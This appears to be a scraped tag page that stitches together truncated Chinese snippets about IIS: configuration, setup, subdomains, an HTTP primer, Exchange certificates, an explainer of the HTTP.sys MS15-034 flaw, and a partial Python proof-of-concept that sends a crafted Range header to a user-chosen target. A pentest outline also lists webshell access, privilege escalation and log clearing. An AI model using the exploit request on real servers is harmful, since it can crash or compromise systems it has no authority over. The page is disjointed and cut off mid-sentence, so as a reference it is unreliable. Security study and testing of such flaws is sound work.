iis

应用程序在某些时刻总是需要一些外挂配置，云原生应用的实践是 在容器化之前就将应用程序配置保留在代码之外。 “ 12-Factors App ：Store config in the environment ① 外挂配置文件：业务配置 appsettings.json “ 可以在代码中要求加载appsetting.serect.json配置文件，但是不加入代码版本管理==>敏感信息分离。 ② 环境变量: 单条业务配置(API_URL_PREFIX) 框架配置(ASPNETCORE_ENVIRONMENT=Production) 部署配置(Tag=v1.2) 敏感信息(AppId,AppAuthIssuer,AppSerect) 环境变量 现代操作系统均支持存储key-value环境变量，所有程序都能从OS获取特定环境变量。 ASP.NET Core默认脚手架：环境变量配置在第4位置插入 “ IConfiguration会拷贝环境变量键值对，后续同名配置会覆盖之前同名配置值，但是环境变量本身不会变化。 public static string? GetEnvironmentVariable(string variable); 环境变量来自三个级别：进程、用户、系统 // Specifies the location where an environment variable is

01 漏洞描述 上篇文章 介绍了Host头攻击，今天我们讲一讲HTTP.sys远程代码执行漏洞。 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序，为了优化IIS服务器性能，从IIS6.0引入，IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞，当攻击者向受影响的Windows系统发送特殊设计的HTTP 请求，HTTP.sys 未正确分析时就会导致此漏洞，成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 主要存在Windows+IIS的环境下，任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响。 02 漏洞知识拓展 说到HTTP.sys远程代码执行漏洞，不得不先介绍一下Range首部字段。 在“上古时代”，网络并不是很好，下载大型文件很不容易。下载途中如果网络中断，就得重头开始下。为了解决这个问题，HTTP/1.1引入了范围请求。 在请求报文的Range首部字段中指定资源的byte范围，告诉服务器，请求的是资源哪个范围的内容，让断点续传和并行下载得以实现。 如果服务器支持范围请求，响应包中就会存在Accept-Ranges字段(且值不为

　　Win10系统中的Web服务器是什么？ 　　在局域网中进行资源共享，以便Win10使用者时刻都能将个人数据传达服务器端中，快速执行数据的同步。 　　如何搭建Web服务器呢? 　　我分享的第二种解决Web服务器怎样搭建在Win10系统中的方法，如下： 　　1、点击“开始——控制面板—— 程序”选项，在弹出的窗口点击左侧“打开或关闭Windows服务”键值。 　　2、在出现的菜单中点选“Internet信息服务”项下方的全部项目，点选“确定”键值。 　　3、进行更新服务。 　　4、更新成功后开启浏览器，键入“http://localhost/”按回车键，若是此时显示出IIS7欢迎面板，表明Web服务器就已成功搭建。 　　5、当web服务器成功搭建后，将开发的网站装载到Web服务器的选项中。通常当Web服务器成功装载后，都会建立路径“%系统根目录%inetpub/wwwroot”，把已开发的网站拷贝至此路径里便可执行本地访问那个网站了。 　　6、然后设定防火墙，使局域网的别的电脑也可以访问本地网站资源。步骤是：点“开始——控制面板——系统和安全——允许程序通过Windows防火墙”等键值，在出现的窗口中的“万维网服务HTTP”前面以及右侧两框都打上“√”，再点“确定”保存。 　　7、设置后在局域网中其他电脑的使用者，开启浏览器点击输入“http://Web服务器的IP地址/

最近公司网站分站比较多；但是服务器只有一个，所以在IIS部署站点的时候，就会有多个端口。但是域名只有一个，所以要用二级域名来隐藏端口，既美观也安全。 顶级域名：什么是顶级域名？打个比方，就是带www的，例如：www.baidu.com 二级域名：二级域名也就是在顶级域名下的子域名。例如：map.baidu.com 最近研究二级域名也研究好久，网上说的也是只言片语的，不是太完整。我就做个整理 首先，做二级域名。主要一个是为了隐藏端口，一个是将网站分块。 IIS + 域名供应商 两种设置二级域名的方法；我拿阿里云的 “云解析DNS” 来做整理 ： 1.A记录 泛型解析 ，（建议推荐 泛型解析 来做二级域名）。直观点，直接上图 就用map.baidu.com来说 如图： 图2： 说明：这里在IIS设定的 80 端口和顶级域名设定的80 端口不会冲突；还有就是IP 地址 记得选择 服务器IP ；主机名 就写二级域名就可以。 2.隐性URL ，（不建议推荐使用 因为这个设定其实就是URL转发，但是URL 转发 一般都是有限制的，如果十几个子域名设定 那就麻烦了）。直观点，直接上图 说明:隐性URL 设定 子域名，由于 控制的工作主要都是域名解析那边，所有IIS的配置跟顶级域名配置一样就可以了。 来源： oschina 链接： https://my.oschina.net/u/4409491

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 官方文档： https://technet.microsoft.com/zh-cn/library/security/MS15-034 POC(python2)： 1 # !/usr/bin/env python 2 # -*-coding:utf-8-*- 3 4 import socket 5 import random 6 7 ipAddr = raw_input( " Please set your target: " ) 8 hexAllFfff = " 18446744073709551615 " 9 req1 = " GET / HTTP/1.0\r\n\r\n " 10 req = " GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0- " + hexAllFfff + " \r\n\r\n " 11 12 print " [*] Audit Started " 13 14 try : 15 client_socket = socket.socket(socket.AF_INET, socket.SOCK

　　当没有iis环境、想快速启动几个api接口测试又觉得新建一个api项目麻烦？来使用控制台做宿主，快速改几个api测试吧！ 　　1.新建控制台项目 　　2.安装以下相关依赖 　　Microsoft.AspNet.WebApi 　　Microsoft.AspNet.WebApi.Owin 　　Microsoft.Owin.Hosting 　　Microsoft.Owin.Host.HttpListener 　　3.新建API控制器，需要注意一下几点约定 　　>控制器放在文件夹Controllers下（没有新建一个） 　　>控制器继承自ApiController 　　>控制其名称符合“名称+Controller”规范 　　比如： 　　 　　其它与WebAPI的写法一致即可 　　4.新建StartUp类--根目录新建StartUp.cs 　　 1 public class Startup 2 { 3 public void Configuration(IAppBuilder appBuilder) 4 { 5 HttpConfiguration config = new HttpConfiguration(); 6 7 config.Routes.MapHttpRoute(name: " DefaultApi " , 8 routeTemplate: " api/{controller

导引： http简介：定义；特点；url组成 请求消息request：request组成；头部信息；请求参数；body的4种类型 响应消息response：response组成 http请求方法：常用方法（最基本4种）；get和post区别（请求形式；数据大小；变量获取方式；安全） http工作原理 http状态码 ------------------------------------------------------- 一、http简介 一个完整的 http 协议其实就两块内容，一个是发的请求，一个服务端给的响应。 1、http 一般定义 1）HTTP协议是Hyper Text Transfer Protocol（超文本传输协议）的缩写,是用于从万维网（WWW:World Wide Web ）服务器传输超文本到本地浏览器的传送协议。 2）HTTP（HyperText Transfer Protocol）协议是基于 TCP 的应用层协议，它不关心数据传输的细节，主要是用来规定客户端和服务端的数据传输格式，最初是用来向客户端传 输 HTML 页面的内容。默认端口是 80。 3）http（超文本传输协议）是一个基于请求与响应模式的、无状态的、应用层的协议。 2、http主要特点 1）简单快速：客户向服务器请求服务时，只需传送请求方法和路径。请求方法常用的有GET、HEAD、POST

给你一个网站你是如何来渗透测试的? 在获取书面授权的前提下。 1)信息收集， 1，获取域名的whois信息,获取注册者邮箱姓名电话等。 2，查询服务器旁站以及子域名站点，因为主站一般比较难，所以先看看旁站有没有通用性的cms或者其他漏洞。 3，查看服务器操作系统版本，web中间件，看看是否存在已知的漏洞，比如IIS，APACHE,NGINX的解析漏洞 4，查看IP，进行IP地址端口扫描，对响应的端口进行漏洞探测，比如 rsync,心脏出血，mysql,ftp,ssh弱口令等。 5，扫描网站目录结构，看看是否可以遍历目录，或者敏感文件泄漏，比如php探针 6，google hack 进一步探测网站的信息，后台，敏感文件 2）漏洞扫描 开始检测漏洞，如XSS,XSRF,sql注入，代码执行，命令执行，越权访问，目录读取，任意文件读取，下载，文件包含， 远程命令执行，弱口令，上传，编辑器漏洞，暴力破解等 3）漏洞利用 利用以上的方式拿到webshell，或者其他权限 4）权限提升 提权服务器，比如windows下mysql的udf提权，serv-u提权，windows低版本的漏洞，如iis6,pr,巴西烤肉， linux藏牛漏洞，linux内核版本漏洞提权，linux下的mysql system提权以及oracle低权限提权 5) 日志清理 6）总结报告及修复方案 sqlmap

配置证书： 第一步，在ECP界面生成证书请求文件： 1、在“服务器 —>证书”界面，选择一台服务器，点击“+”来添加证书申请，如下图： 2、默认下一步， 3、填写证书的友好名称，如下图： 4、默认下一步， 5、选择存储证书的服务器，如下图： 6、填写外部访问（从Internet访问时）的域名为：mail.contoso.com，自动发现为默认的：autodiscover.contoso.com， POP或IMAP只填主机名（不加后缀）：mail，可以添加多个，用“，”号隔开，如下图： 7、在以下界面，添加所有在内外网要用到的域名或主机名，如果有多域名或二级域名，在这里都要添加，如下图： 8、填写组织信息，如下图： 9、填写证书请求保存的共享路径，这里选择mail2上的cert共享文件夹下，如下图： 注：如无法保存，请赋予共享文件夹的"everyone"读写权限。 10、证书申请完成，状态为“搁置的请求”，如下图： 第二步，向CA证书服务器申请证书并获取证书文件： 1、在mail2服务器上，登陆到CA证书服务器的申请证书界面：http://adds.contoso.com/certsrv，如下图： 2、进入证书服务页面，点击“申请证书”，如下图： 3、选择“高级证书申请”，如下图： 4、选择“使用base64编辑的CMC...”，如下图： 5、用“记事本